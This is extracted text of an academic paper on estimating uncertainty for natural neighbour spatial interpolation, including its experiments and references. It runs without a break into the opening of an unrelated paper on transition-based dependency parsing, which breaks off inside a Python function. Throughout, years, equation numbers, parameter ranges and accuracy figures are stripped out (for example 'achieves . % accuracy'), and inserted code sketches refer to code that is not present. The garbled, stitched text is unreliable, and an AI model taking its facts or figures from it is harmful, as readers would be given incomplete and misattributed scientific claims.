(d) for an interpolation cell ci the distance to all raster cells c is calculated as d(ci →c), and (e) by comparing d(ci →c) to d(p →c) identifies z(ci) which are those cells of z(p) that are as close or closer to the ci than any data cell p. the mean value of z(ci) is the natural neighbour interpolation estimate ẑ for ci, and by repeating this process for all raster cells (f) the natural neighbour interpolation is produced. full-size doi: . /peerjcs. /fig- that is simply the mean of all the absolute errors (willmott & matsuura, ). however, there is little point in doing this for the data cells of natural neighbour interpolation as given property (i) that it is an exact interpolator the estimated value ẑi for the data cells will always be the same as the actual value zi so the absolute errors will always be zero. therefore, mae needs to be applied in conjunction with a cross-validation approach that iteratively withholds each data cell pi from the set of data cells p to produce the set {p−pi}, and then uses interpolation to estimate the value ẑi at the withheld data cell pi on the basis of a discrete voronoi diagram v ({p−pi}) that is developed without the etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. withheld data cell. the absolute error ei for each data cell pi is then calculated as ei=|ẑi−zi| and the cross-validation mae can be calculated using eq. ( ). even with cross-validation the mae like all global error estimates, such as the commonly used root-mean-square error (rmse), are not ideal measures of uncertainty for a spatial interpolation (zhang & goodchild, ). as non-spatial methods that average errors across space they cannot indicate if errors are consistent across space or if higher errors in one region are balanced out by lower errors in another region. this is a critical limitation of global error estimation methods, as for application purposes it could be very useful to know where the interpolation uncertainty is higher or lower. cross-validation error field one way to communicate the spatial uncertainty of geographical information is to map estimates of error (zhang & goodchild, ). this has been attempted before for natural neighbour interpolation (bater & coops, ; ghosh, gelfrand & mlhave, ), but as already noted these statistical modelling approaches are contrary to natural neighbour interpolation’s useful properties (v), (vi), and (vii). another way to map estimates of error that is consistent with the properties of natural neighbour interpolation is the cross-validation error field (willmott & matsuura, ). this process begins in a similar manner to the cross-validation mae, but once e has been calculated for each data cell, rather than average the errors using eq. ( ) the errors are assumed to be spatially autocorrelated and interpolation is used to interpolate e to estimate an absolute error field ê. this use of localised absolute errors is highly advantageous as it is consistent with property (iii) of natural neighbour interpolation and allows for error estimates to reflect local changes in the spatial-autocorrelation of the phenomenon being interpolated, with lower errors in more autocorrelated areas and higher errors less autocorrelated areas. 
however, while the cross-validation error field does indicate where interpolation errors are likely to be higher, it cannot be used directly as a measure of uncertainty for natural neighbour interpolation as ultimately the interpolation is calculated using all n data cells and given property (i) of natural neighbour interpolation is that it is an exact interpolator we know we will have zero error and hence zero uncertainty at the data cells. on the basis of tobler’s first law of geography that ‘‘everything is related to everything else, but near things are more related than distant things’’ (tobler, ), zhang & goodchild ( ) recognise that distance is an important component of uncertainty as locations nearer to data should have less uncertainty. this relationship of increasing error with increasing distance to data has even been demonstrated for natural neighbour interpolation (keller et al., ). therefore, i propose to extend the cross-validation error field idea by incorporating distance to produce a cross-validation error-distance field that will better represent the uncertainty associated with natural neighbour interpolation. natural neighbour distances a positive relationship between natural neighbour interpolation absolute errors and the minimum distance to a data cell has been shown (keller et al., ), so this relationship could be used to predict absolute error as a function of distance from the nearest data etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure computation of the natural neighbour distance. (a) for an interpolation raster cell ci the eu- clidean distance to all data cells dj is calculated, and the discrete voronoi diagram v (p) is used to produce d(p) that interpolates the distances by the discrete voronoi polygons. (b) the cells of d(p) that are closer to ci than any data cell defines the set d(ci) and the mean value of this set gives the natural neighbour dis- tance δ for ci. (c) when repeated for all raster cells a natural neighbour distance field is produced. full-size doi: . /peerjcs. /fig- point. however, minimum distance to a data cell is a simplistic metric that does not account for the number and spatial configuration of the data cells (keller et al., ). in addition, using the minimum distance from data cells d(p) produces a field that has discontinuities along the edges of the discrete voronoi polygons (fig. b) that are contrary to the property (ii) of the natural neighbour interpolation method that creates surfaces free of any discontinuities. therefore, the natural neighbour distance δ is presented as a more appropriate measure of distance that incorporates information about the number, spatial distances, and relative positions of the data cells forming the interpolation. the method to calculate δ follows a very similar approach to that of calculating the interpolation, and therefore recycles various data structures that are used for the interpolation. for each interpolation cell ci the euclidean distances to all data cells are calculated dj =d(ci→pj), and then using the voronoi diagram v (p) these distances are interpolated via nearest neighbour interpolation to produce d(p) that is the distance to the data cells mapped into the discrete voronoi polygons (fig. a). the set v (ci) can be used again to find the set of relevant data cell distances d(ci)={c ∈d(p)|c ∈v (ci)} ( ) that will form the basis of the interpolation to that cell (fig. b). 
the natural neighbour distance is then calculated as δ(ci)= ∑ d(ci) ]d(ci) ( ) that is simply the mean value of the distances for the cells in d(ci). with δ calculated for all raster cells it becomes evident that unlike minimum distance that contains spatial etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. discontinuities (fig. b) the natural neighbour distance creates a smooth surface free of any discontinuities (fig. c). also, the minimum distance is an optimistic measure of distance as it only accounts for the closest data cell, whereas by comparison the distances for δ are larger as they recognise that the other data cells involved in the interpolation are further away. cross-validation error-distance field to incorporate δ into the estimate of error to produce a cross-validation error-distance field, the first step is still a cross-validation process in which each data cell is iteratively withheld and an estimate of the value of the withheld data cell is made with the remaining n− data cells. however, the absolute error e =|zi− ẑi| is now divided by the natural neighbour distance δ to calculate a rate of error r for each data cell ri= |zi− ẑi| δi ( ) with these rates of error stored so that each data cell becomes pi={xi,yi,zi,ri}. then when conducting the natural neighbour interpolation, while estimating the value ẑ an estimate of the rate of error r̂ can be simultaneously produced (fig. a) and used to produce an error estimate êi= r̂i×δi ( ) that when estimated for all cells produces a cross-validation error-distance field (fig. b). the cross-validation error-distance field clearly captures information from the rate of error field (fig. a) and the natural neighbour distance field (fig. c) with lower error estimates in areas that have either low rates of error or natural neighbour distances, and higher error estimates in areas that have higher rates of error and/or natural neighbour distances. therefore, the cross-validation error-distance field captures uncertainty information relating to local variation in both the autocorrelation of the underlying phenomenon field being interpolated and the spatial distribution of the data cells providing data for the interpolation. virtual geography experiments the discrete natural neighbour interpolation and cross-validation error-distance field algorithms described here were implemented using a python computational framework (pérez, granger & hunter, ) using the numpy (van der walt, colbert & varoquaux, ), scipy (virtanen et al., ), and matplotlib (hunter, ) packages. having proposed a new method, it is sensible to provide an evaluation of how performance varies under different conditions. however, in doing so it is important to remember that interpolation errors result not only from the efficacy of the interpolation method, but also from distribution of data points and the real (but unknown) distribution of the phenomenon field being interpolated (willmott & matsuura, ) that will be unique to each study. also, what constitutes an acceptable level of interpolation error will also vary between studies. therefore, the objective here is try and identify simple trends in performance to verify the methods work as would be expected and to provide some basic etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure computation of the cross-validation error-distance field. 
(a) the rate of absolute error for each data cell ri calculated through cross-validation, and then an estimated rate of absolute error field r̂ is produced by natural neighbour interpolation of r. (b) the cross-validation error-distance field ê that is the product of r̂ and the natural neighbour distance δ for each interpolation cell. full-size doi: . /peerjcs. /fig- information that will help an analyst to make a more detailed assessment of whether interpolation is feasible or not. to evaluate the effectiveness of the proposed interpolation methods, a series of in silico virtual geography experiments were conducted. virtual geographies are a very useful approach for methodological evaluation as the conditions can be tightly controlled and explored fully. virtual geographic phenomena fields for grids of × cells were created using the nlmpy package (etherington, holland & o’sullivan, ) implementation of the mid-point displacement fractal algorithm that produces fields representing natural phenomena such as land surfaces (fournier, fussell & carpenter, ). the spatial- autocorrelation of the values produced by the mid-point displacement method can be controlled by varying the h parameter to produce fields with spatial-autocorrelation that varies from low to high (fig. ). the underlying premise of the experiments was that with random sampling of a virtual geographic phenomenon with actual values z (fig. a), natural neighbour interpolation can be used to produce estimated values ẑ (fig. b). the absolute difference between the actual values and the estimated values is the value error e(ẑ)=|ẑ−z| (fig. c) that will indicate how well the natural neighbour interpolation method works. the value error is also estimated by the cross-validation error-distance field ê (fig. d), and the absolute difference between the value error e(ẑ) and the estimated error ê is the error of errors e(ê)=|ê−e(ẑ)| that indicates how well the proposed cross-validation error-distance field performs (fig. e). etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure examples of virtual geographic phenomena fields created by the mid-point displacement fractal algorithm. the spatial-autocorrelation varies from low to high and is controlled by the h parame- ter that in these examples has been set to (a) h= , (b) h= , and (c) h= . full-size doi: . /peerjcs. /fig- to summarise the performance of both natural neighbour interpolation and the cross- validation error-distance field, the mae (eq. ( )) was calculated for the cells inside and outside of the convex hull of the sampling points for both e(ẑ) (fig. c) and e(ê) (fig. e). the mae was chosen as the error statistic as it expresses error in the same units as the variable of interest and is insensitive to the number of cells in the sample (willmott & matsuura, ), which was important here as the convex hull area would vary as a result of the random sampling. when the spatial-autocorrelation and number of sample points is reduced we would expect a reduction in performance of both the natural neighbour interpolation and the cross-validation error-distance field (figs. a– e versus figs. f– j). therefore, to examine how the natural neighbour methods performed under varying conditions experiments were conducted in which h randomly varied uniformly between . to . and n randomly varied uniformly between to . 
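the experimental loop just described can be condensed into a short sketch. this is schematic and not the released supplementary code: nn_interpolate_with_error is a hypothetical stand-in for the natural neighbour interpolation and cross-validation error-distance field routines described above, the uniform ranges for h and n are placeholders for the ranges used in the experiments, and nlmpy's mpd(nRow, nCol, h) interface is assumed.

```python
# one virtual geography experiment: generate a fractal field, sample it at
# random cells, interpolate, and summarise errors inside/outside the convex hull.
import numpy as np
import nlmpy
from scipy.spatial import Delaunay

def run_experiment(rows=100, cols=100, seed=1):
    rng = np.random.default_rng(seed)
    h = rng.uniform(0.0, 1.0)                    # placeholder range for spatial autocorrelation
    n = int(rng.integers(10, 100))               # placeholder range for number of sample points
    z = nlmpy.mpd(rows, cols, h)                 # virtual phenomenon field (mid-point displacement)
    pts = np.column_stack([rng.integers(0, rows, n), rng.integers(0, cols, n)])
    # hypothetical routine implementing the interpolation and error-distance field above
    z_hat, e_hat = nn_interpolate_with_error((rows, cols), pts, z[pts[:, 0], pts[:, 1]])
    e_z = np.abs(z_hat - z)                      # value error e(z_hat)
    e_e = np.abs(e_hat - e_z)                    # error of errors e(e_hat)
    rr, cc = np.meshgrid(np.arange(rows), np.arange(cols), indexing="ij")
    cells = np.column_stack([rr.ravel(), cc.ravel()])
    inside = (Delaunay(pts).find_simplex(cells) >= 0).reshape(rows, cols)
    return {"h": h, "n": n,
            "mae_value_inside": e_z[inside].mean(), "mae_value_outside": e_z[~inside].mean(),
            "mae_error_inside": e_e[inside].mean(), "mae_error_outside": e_e[~inside].mean()}
```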
the cross-validation mae was also calculated for each experiment to assess if the cross-validation mae could be used as an indicator of expected interpolation performance. results the results from the virtual geography experiments demonstrate that, as would be expected for the cells within the convex hull of the sampling points, the mae of the value errors e(ẑ) from the natural neighbour interpolation (fig. a) and error of errors e(ê) from the cross-validation error-distance field (fig. b) reduced as the number of data points n and the spatial-autocorrelation h of the underlying virtual phenomena fields increased. the effect of h was more important, as when h was low or high n did not have much effect on the performance. the importance of h is to be expected as all interpolation methods work on the assumption that the phenomenon being interpolated has sufficient levels of spatial-autocorrelation. etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the natural neighbour interpolation virtual geography experimental process. (a) a virtual geography phenomenon field z with spatial-autocorrelation of h= and n= random sampling points, (b) the resulting natural neighbour interpolation ẑ from the sampling points, and (c) value error e(ẑ) = |ẑ −z|. (d) the cross-validation error-distance field estimated error ê that is also produced during inter- polation is then compared to the value error e(ẑ) to produce (e) the error of errors e(ê) =|ê −e(ẑ)|. in- terpolation performance as a function of e(ẑ) and e(ê) was summarised for cells within and outside the convex hull of the sampling points. the same experimental process in (a–e) is replicated in (f–j) for a virtual geography phenomenon field with spatial-autocorrelation of h = and n = random sampling points, demonstrating a reduction in interpolation performance at lower levels of spatial-autocorrelation and sampling. full-size doi: . /peerjcs. /fig- there was also a very strong correlation between e(ẑ) and e(ê) (fig. c) and this similarity of behaviour under different conditions indicates that the cross-validation error-distance field meets the objective of providing a measure of uncertainty that is consistent with all the useful properties of natural neighbour interpolation. while the results of the virtual geography experiments (figs. a and b) indicate that lower average errors can be expected when n∼> and h∼> . (fig. b) such criteria cannot be easily applied by an analyst as while n is known h is unknown and in many situations will be hard to guess. fortunately, while the cross-validation mae that can always be calculated by an analyst is generally slightly higher than the e(ẑ) there is still a strong correlation between the two variables (fig. d), and this correlation is extremely useful as it indicates to an analyst the likely levels of e(ẑ) and therefore e(ê) too. a comparison of e(ẑ) and e(ê) inside and outside of the convex hull around the sampling points clearly shows that while the performance follows a similar trend e(ẑ) and e(ê) can be expected to be higher outside of the convex hull (figs. e– f). etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure performance of natural neighbour interpolation and cross-validation error-distance fields from virtual geography experiments. 
the mean absolute error (mae) of cells within the convex hull around sampling points for different experimental combinations of the number n of random sampling points and the spatial-autocorrelation h of virtual phenomena fields for (a) the value errors e(ẑ) from the natural neighbour interpolations and (b) the error of errors e(ê) from the cross-validation error-distance fields that (c) were highly correlated. (d) comparison of e(ẑ) and the cross-validation mae derived from the sampling points. comparison of interpolation performance inside and outside the convex hull around the sampling points for (e) e(ẑ) and (f) e(ê). full-size doi: . /peerjcs. /fig- etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. discussion the virtual geography experiments indicate that under suitable conditions the natural neighbour interpolation field and the cross-validation error-distance field should provide useful estimates of a geographic phenomenon field with associated uncertainty. the fact that the cross-validation error-distance field reflects localised changes in the spatial distribution of both the underlying phenomenon and the point data is particularly useful, and contrasts with other spatial interpolation uncertainty methods such as mae and rmse that estimate error using a global approach. the virtual geography experiments demonstrated that the performance of natural neighbour interpolation will be lower outside of the convex hull around the data points, as is expected (watson, )—although this is also likely to be true of all spatial interpolation techniques as beyond the convex hull interpolation becomes extrapolation. however, we do not suggest that interpolation should be restricted to within the convex hull as there may be occasions where the area of interest may occur slightly outside the convex hull. for example, when interpolating rainfall data from weather stations that are usually sited in settlements, there are likely to be areas of coastline along peninsulas and headlands that will not fall within a convex hull around the weather stations (lyra et al., ). therefore, it is logistically useful that discrete natural neighbour interpolation can produce estimated values beyond the convex hull of the available data points. what is helpful in this context is that the cross-validation error-distance field incorporates information on distance from data points, therefore as interpolations move further beyond the convex hull the error-field should increase to help to guard against erroneous estimates. however, the responsibility of appropriate use of natural neighbour interpolation still belongs with the spatial analyst who must make decisions about whether interpolation is useful based on their knowledge of: the expected spatial-autocorrelation of the phenomenon being interpolated, the number and distribution of data points, the location of the areas for which interpolations are required, and the magnitude of the estimated errors in relation to the magnitude of the value estimates. and of course, the cross-validation error-distance field only captures uncertainty in the interpolation itself and does not incorporate any uncertainty that may arise from the data itself. 
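for reference, the cross-validation mae referred to in this discussion reduces to a simple leave-one-out loop. the sketch below is illustrative only; nn_interpolate_at is a hypothetical helper returning the natural neighbour estimate at one location given the remaining data cells.

```python
# leave-one-out cross-validation mae for a set of data cells (illustrative sketch).
import numpy as np

def cross_validation_mae(data_xy, data_z):
    errors = []
    for i in range(len(data_z)):
        keep = np.arange(len(data_z)) != i                   # withhold data cell i
        z_hat = nn_interpolate_at(data_xy[i], data_xy[keep], data_z[keep])
        errors.append(abs(z_hat - data_z[i]))                # absolute error e_i
    return float(np.mean(errors))                            # mean of the absolute errors
```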
while i have argued against the use of the cross-validation mae as a measure of uncertainty, i would recommend that analysts continue to calculate the cross-validation mae given its strong correlation with the performance of the natural neighbour interpolation, and therefore the performance of the cross-validation error-distance field too. analysts can then use the cross-validation mae as a helpful guide when deciding if interpolation is advisable or not. when doing so it is important to remember that as the cross-validation mae is based on the use of n− data cells, the error estimates may be slightly higher than the real errors that would be based on all n data that is ultimately used in the interpolation (willmott & matsuura, ). therefore, the cross-validation mae should be seen as a slightly conservative indication of likely interpolation performance. etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusion for those researchers for whom natural neighbour interpolation is the best interpolation option, the cross-validation error-distance field method presented provides a way to assess the uncertainty associated with natural neighbour interpolations that is consistent with the useful properties of natural neighbour interpolation. while the cross-validation error-distance method has been described here in the context of discrete natural neighbour interpolation, there is no reason why this same approach could not be applied to geometric natural neighbour interpolation as well. discrete natural neighbour interpolation has been implemented here in two-dimensional space for ease of visualisation, but the method will generalise to higher dimensions (park et al., ) and in principle i cannot see any reason why the uncertainty method presented could not also be applied in higher dimensions by those who wish to do so. the approach could easily be adapted to other interpolation methods, as all that is required is a measure of weighted distances to the data points creating the interpolation. given the promise of the algorithm, and to encourage its use and development, the python code used to generate the examples presented is freely available under the permissive mit license as supplementary material. additional information and declarations funding this work was supported by the strategic science investment funding for crown research institutes from the new zealand ministry of business, innovation and employment’s science and innovation group. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: strategic science investment funding for crown research institutes from the new zealand ministry of business, innovation and employment’s science and innovation group. competing interests thomas r. etherington is employed by manaaki whenua-landcare research, and declares that there are no competing interests. author contributions • thomas r. etherington conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: python scripts to reproduce the examples, virtual experiments, and figures are available as a supplementary file. etherington ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abramov o, mcewan a. . an evaluation of interpolation methods for mars orbiter laser altimeter (mola) data. international journal of remote sensing ( ): – doi . / . bater cw, coops nc. . evaluating error associated with lidar-derived dem interpo- lation. computers & geosciences ( ): – doi . /j.cageo. . . . burrough pa, mcdonnell ra. . principles of geographical information systems. oxford: oxford university press. etherington tr, holland ep, o’sullivan d. . nlmpy: a python software package for the creation of neutral landscape models within a general numerical framework. methods in ecology and evolution ( ): – doi . / - x. . fournier a, fussell d, carpenter l. . computer rendering of stochastic models. communications of the acm ( ): – doi . / . . ghosh s, gelfrand ae, mlhave t. . attaching uncertainty to deterministic spatial in- terpolations. statistical methodology ( – ): – doi . /j.stamet. . . . hofstra n, haylock m, new m, jones p, frei c. . comparison of six methods for the interpolation of daily, european climate data. journal of geophysical research (d ):d doi . / jd . hunter jd. . matplotlib: a d graphics environment. computing in science & engineering ( ): – doi . /mcse. . . keller vdj, tanguy m, prosdocimi i, terry ja, hitt o, cole sj, fry m, morris dg, dixon h. . ceh-gear: km resolution daily and monthly areal rainfall estimates for the uk for hydrological and other applications. earth system science data ( ): – doi . /essd- - - . lyra gb, correia tp, de oliveira-jnior jf, zeri m. . evaluation of methods of spatial interpolation for monthly rainfall data over the state of rio de janeiro, brazil. theoretical and applied climatology ( ): – doi . /s - - - . okabe a, boots b, sugihara k, chiu sn. . spatial tessellations: concepts and applications of voronoi diagrams. nd edition. chichester: john wiley & sons. o’sullivan d, unwin dj. . geographic information analysis. nd edition. hoboken: john wiley & sons. park sw, linsen l, kreylos o, owens jd, hamann b. . discrete sibson interpo- lation. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . pérez f, granger be, hunter jd. . python: an ecosystem for scientific computing. computing in science & engineering ( ): – doi . /mcse. . . etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . / - x. http://dx.doi.org/ . / . http://dx.doi.org/ . /j.stamet. . . http://dx.doi.org/ . / jd http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /essd- - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /peerj-cs. sambridge m, braun j, mcqueen h. . geophysical parametrization and interpo- lation of irregular data using natural neighbours. geophysical journal international ( ): – doi . /j. - x. .tb .x. sibson r. . a brief description of natural neighbour interpolation. in: barnett v, ed. interpreting multivariate data. chichester: wiley, – . slocum ta, mcmaster rb, kessler fc, howard hh. . thematic cartography and geovisualization. harlow: pearson education limited. tobler w. . 
a computer movie simulating urban growth in the detroit region. economic geography ( ): – doi . / . tomlin cd. . geographic information systems and cartographic modeling. englewood cliffs: prentice-hall. van der walt s, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science & engineering ( ): – doi . /mcse. . . virtanen p, gommers r, oliphant te, haberland m, reddy t, cournapeau d, burovski e, peterson p, weckesser w, bright j, van der walt sj, brett m, wilson j, millman kj, mayorov n, nelson arj, jones e, kern r, larson e, carey cj, polat i, feng y, moore ew, vanderplas j, laxalde d, perktold j, cimrman r, henriksen i, quintero ea, harris cr, archibald am, ribeiro ah, pedregosa f, van mulbregt p, vijaykumar a, bardelli ap, rothberg a, hilboll a, kloeckner a, scopatz a, lee a, rokem a, woods cn, fulton c, masson c, häggström c, fitzgerald c, nicholson da, hagen dr, pasechnik dv, olivetti e, martin e, wieser e, silva f, lenders f, wilhelm f, young g, price ga, ingold g-l, allen ge, lee gr, audren h, probst i, dietrich jp, silterra j, webber jt, slavi j, nothman j, buchner j, kulick j, schnberger jl, de miranda cardoso jv, reimer j, harrington j, rodrguez jlc, nunez-iglesias j, kuczynski j, tritz k, thoma m, newville m, kmmerer m, bolingbroke m, tartre m, pak m, smith nj, nowaczyk n, shebanov n, pavlyk o, brodtkorb pa, lee p, mcgibbon rt, feldbauer r, lewis s, tygier s, sievert s, vigna s, peterson s, more s, pudlik t, oshima t, pingel tj, robitaille tp, spura t, jones tr, cera t, leslie t, zito t, krauss t, upadhyay u, halchenko yo, vázquez-baeza y. . scipy . : fundamental algorithms for scientific computing in python. nature methods ( ): – doi . /s - - - . watson d. . the natural neighbor series manuals and source codes. computers & geosciences ( ): – doi . /s - ( ) - . willmott cj, matsuura k. . advantages of the mean absolute error (mae) over the root mean square error (rmse) in assessing average model performance. climate research ( ): – doi . /cr . willmott cj, matsuura k. . on the use of dimensioned measures of error to eval- uate the performance of spatial interpolators. international journal of geographical information science ( ): – doi . / . yilmaz hm. . the effect of interpolation methods in surface definition: an experimental study. earth surface processes and landforms ( ): – doi . /esp. . etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - x. .tb .x http://dx.doi.org/ . / http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /cr http://dx.doi.org/ . / http://dx.doi.org/ . /esp. http://dx.doi.org/ . /peerj-cs. zhang j, goodchild m. . uncertainty in geographical information. london: taylor & francis doi . /b . etherington ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /b http://dx.doi.org/ . /peerj-cs. efficient structured inference for transition-based parsing with neural networks and error states ashish vaswani∗ usc information sciences institute vaswani@usc.edu kenji sagae∗ usc institute for creative technologies sagae@usc.edu abstract transition-based approaches based on local classification are attractive for dependency parsing due to their simplicity and speed, despite producing results slightly below the state-of-the-art. 
in this paper, we propose a new approach for approximate structured in- ference for transition-based parsing that pro- duces scores suitable for global scoring us- ing local models. this is accomplished with the introduction of error states in local train- ing, which add information about incorrect derivation paths typically left out completely in locally-trained models. using neural net- works for our local classifiers, our approach achieves . % accuracy for transition-based dependency parsing in english. introduction transition-based parsing approaches based on local classification of parser actions (nivre, ) remain attractive due to their simplicity, despite producing results slightly below the state-of-the-art. although the application of online structured prediction and beam search has made transition-based parsing com- petitive in accuracy (zhang and clark, ; huang et al., ) while retaining linear time complex- ity, greedy inference with locally-trained classifiers is still widely used, and techniques for improving the performance of greedy parsing have been pro- posed recently (choi and palmer, ; goldberg and nivre, ; goldberg and nivre, ; hon- nibal et al., ). recent work on the applica- tion of neural network classification to drive greedy transition-based dependency parsing has achieved high accuracy (chen and manning, ), showing ∗both authors contributed equally to this paper. how effective locally-trained neural network mod- els are at predicting parser actions, while providing a straightforward way to improve parsing accuracy using word embeddings pre-trained using a large set of unlabeled data. we propose a novel approach for approximate structured inference for transition-based parsing that uses locally-trained neural networks that, unlike pre- vious local classification approaches, produce scores suitable for global scoring. this is accomplished with the introduction of error states in local training, which add information about incorrect derivation paths typically left out completely in locally-trained models. our approach produces high accuracy for transition-based dependency parsing in english, sur- passing parsers based on the structured perceptron (huang and sagae, ; zhang and nivre, ) by allowing seamless integration of pre-trained word embeddings, while requiring nearly none of the fea- ture engineering typically associated with parsing with linear models. trained without external re- sources or pre-trained embeddings, our neural net- work (nn) dependency parser outperforms the nn transition-based dependency parser from chen and manning ( ), which uses pre-trained word em- beddings trained on external data and more features, thanks to improved search. our experiments show that naive search produces very limited improve- ments in accuracy compared to greedy inference, while search in conjunction with error states that mark incorrect derivations produces substantial ac- curacy improvements. background: transition-based parsing transition-based approaches are attractive in depen- dency parsing for their algorithmic simplicity and straightforward data-driven application. using shift- transactions of the association for computational linguistics, vol. , pp. – , . action editor: marco kuhlmann. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. 
reduce algorithms, such as those pioneered by nivre ( ), the task of finding a dependency structure becomes that of predicting each action in the deriva- tion of desired structure. . arc-standard dependency parsing our parsing models are based on a simple shift- reduce algorithm for dependency parsing known as the arc-standard dependency parsing algorithm (nivre, ). an arc-standard dependency parser maintains one or more parser states t , each com- posed of a stack s = [sm, ...,s ,s ] (where the topmost item is s ) and input buffer w = [w ,w , ...,wn] (where the first element of the buffer is w ). in its initial state t , the stack is empty, and the input buffer contains each token in the input sen- tence with its part-of-speech tag. one of three ac- tions can be applied to a parser state ti to create a new parser state tj: shift, which takes the next word in the input buffer (with its part-of-speech tag), and places it as a tree with a single node on top of the stack (i.e. input token w is consumed to create the new stack item s ); reduce-right, which pops the top two items on the stack, s and s , and pushes onto the stack a new subtree formed by attaching the root node of s as a dependent of s ; and reduce-left, which pops the top two items on the stack, s and s , and pushes onto the stack a new subtree formed by attaching the root node of s as a dependent of s . an alternative formulation keeps only word indices in the stack and input buffer, and includes an addi- tional set of dependency arcs; the two formulations are equivalent. a greedy arc-standard parser keeps only one parser state, choosing at each step one parser action to apply to the current state, which is replaced once application of the chosen action creates the next state. once the current state is a final state, parsing terminates. a final state is one where the input buffer is empty, and the stack contains only one element, which is the dependency tree output. given a way to score parser actions instead of simply choosing one action to apply, a state score can be defined on the sequence of actions resulting in the state. keeping track of multiple states with scores resulting from the application of different valid actions for a sin- gle state creates an exponential search space. beam search can then be applied to search for a high scor- ing state. with global estimation of parameters for scoring parser actions, a beam search can produce more accurate results than greedy parsing by mini- mizing global loss (zhang and clark, ). . local classification initial data-driven transition-based dependency parsing approaches employed locally-trained multi- class models to choose a parser action based on the parser state at each step in the derivation (yamada and matsumoto, ; nivre and scholz, ). in these models, classification is based on a set of fea- tures extracted from the current state of the parser, and creating training examples for the classifier requires only running the transition-based algorithm to reproduce the trees in a training treebank, while recording the features and actions at each step. a classifier is then trained with the actions as classes. while this simple procedure has allowed for train- ing of dependency parsers using off-the-shelf clas- sifier implementations, the resulting parsers are re- stricted to performing greedy search, considering only one tree out of the exponentially many. 
al- though the distribution of class scores for each parser state can be used to create a search space for beam search, the locally normalized scores obtained with these classifiers make searching a largely futile endeavor, since action scores cannot be combined meaningfully to score entire trees or entire deriva- tions. for example, zhao et al. ( ) use max- imum entropy classification for local classification of shift-reduce parsing actions with a dynamic pro- gramming approach based on the work of huang and sagae ( ). despite using exact search, zhao et al. report an improvement of only . % in unlabeled dependency accuracy over greedy parsing, reaching an accuracy of . %, far below the . % obtained with a comparable structured perceptron parser with beam search and very similar features (huang et al., ). similarly, johansson and nugues ( ), who used probability estimates from local svm classification to perform a beam search in transition- based parsing, report some accuracy gains when us- ing a beam of size , but no further gains with larger beams. because transition scores out of each state are normalized locally, the quality of any particular state is in no way captured by the scores that will ultimately result in the overall score for the deriva- tion. in fact, from an incorrect parser state, more incorrect transitions may follow, due to a version of the label bias problem faced by memms (lafferty et al., ; mccallum et al., ). in section , we will present our approach that significantly im- proves search with locally normalized models. . structured perceptron one effective way to create models that score parser transitions globally and allow for effective search is to use the structured perceptron (collins, ). un- like with local classifiers, weight updates are based on entire derivations, instead of individual states. however, because exact inference is too costly for transition-based parsing with a rich feature set, in practice parsers use beam search to perform ap- proximate inference, and care must be taken to en- sure the validity of weight updates (huang et al., ). a widely used approach is to employ early updates, which stop parsing and perform weight up- dates once the desired structure is no longer in the beam (collins and roark, ). transition-based dependency parsers based on the structured perceptron have reached high accuracy (zhang and nivre, ; hatori et al., ), but these parsers remain in general less accurate than high-order graph-based parsers that model depen- dency graphs directly, instead of derivations (zhang and mcdonald, ; martins et al., ). the drawback of these more accurate parsers is that they tend to be slower than transition-based parsers. parsing with local classifiers and error states the standard way to train local classifiers to predict actions for transition-based parsers is to run the pars- ing algorithm using a gold-standard sequence of ac- tions (i.e. a sequence of actions that generates the gold-standard tree from a training set) and record the features corresponding to each parser state, where a parser state includes the parser’s stack, input buffer, and set of dependencies created so far. the features corresponding to a state are then associated with the gold-standard action that should be taken from that state, and this constitutes one training example for the local action classifier. 
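the example-generation procedure just described can be sketched as follows, reusing the State class from the earlier parser sketch; the feature extractor here is a deliberately simplified stand-in and not the feature templates used later in this paper.

```python
# Generating training examples for a local action classifier by replaying
# a gold-standard action sequence and recording (features, action) pairs.

def extract_features(state, tokens, tags):
    """Toy features: words and tags of the top two stack items and the next
    buffer token ('<none>' when a position is empty)."""
    def word(i): return tokens[i] if i is not None else "<none>"
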